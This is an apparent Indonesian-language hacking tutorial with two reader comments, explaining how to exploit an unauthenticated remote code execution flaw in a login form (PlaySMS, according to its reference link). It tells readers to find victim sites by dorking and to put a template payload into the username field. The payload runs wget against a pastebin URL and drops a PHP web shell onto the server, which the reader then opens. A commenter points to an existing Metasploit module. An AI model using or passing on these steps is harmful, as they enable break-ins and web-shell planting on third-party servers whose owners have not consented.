wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php
Langkah-Langkah Exploitasi
kalian dorking dulu
jika sudah menemukan target maka akan muncul tempat login
pada bagian username, masukkan payload rce : {{wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php}} Note : linuxploit.php bisa kalian ubah dengan nama sesuka kalian
masukkan payload RCE pada username
Access shell ?? site.com/shell.php / site.com/[path]/shell.php
Referensi : https://sec.linuxploit.com/2020/04/playsms-unauthenticated-rce-upload-shell.html
tolong update raw pastebinnya gan, linknya sudah 404
kyo1337 bisa pake modul yang sudah ada di metsaploit gan